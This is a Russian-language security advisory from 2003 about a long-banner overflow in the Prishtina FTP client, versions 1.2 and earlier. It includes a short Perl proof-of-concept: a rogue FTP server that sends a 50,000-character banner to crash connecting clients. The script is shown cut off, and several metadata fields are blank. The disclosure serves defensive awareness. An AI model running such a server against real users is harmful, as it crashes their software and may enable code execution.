Длинный FTP баннер может аварийно завершить работу Prishtina FTP клиента

Дата публикации:
28.05.2003
Всего просмотров:
735
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в Prishtina FTP клиенте. Удаленный пользователь может завершить работу клиента.

Damage Hacking Group сообщает, что удаленный FTP сервер может послать длинный FTP баннер к Prishtina FTP клиенту, чтобы аварийно завершить работу клиента и возможно выполнить произвольный код на целевой системе с привилегиями целевого пользователя. DoS эксплоит:

#!/usr/bin/perl
use IO::Socket;
$host = "localhost";
$port = "21";
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM,
Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.\n";
$data = "A";
$num = "50000";
$buf .= $data x $num;
while ($client = $server->accept()) {
 print "OK";
 print $client "$buf\n";
 close($client);
Уязвимость обнаружена в 1.2 и более ранние версии

Ссылки: Prishtina FTP v.1.*: remote DoS
или введите имя

CAPTCHA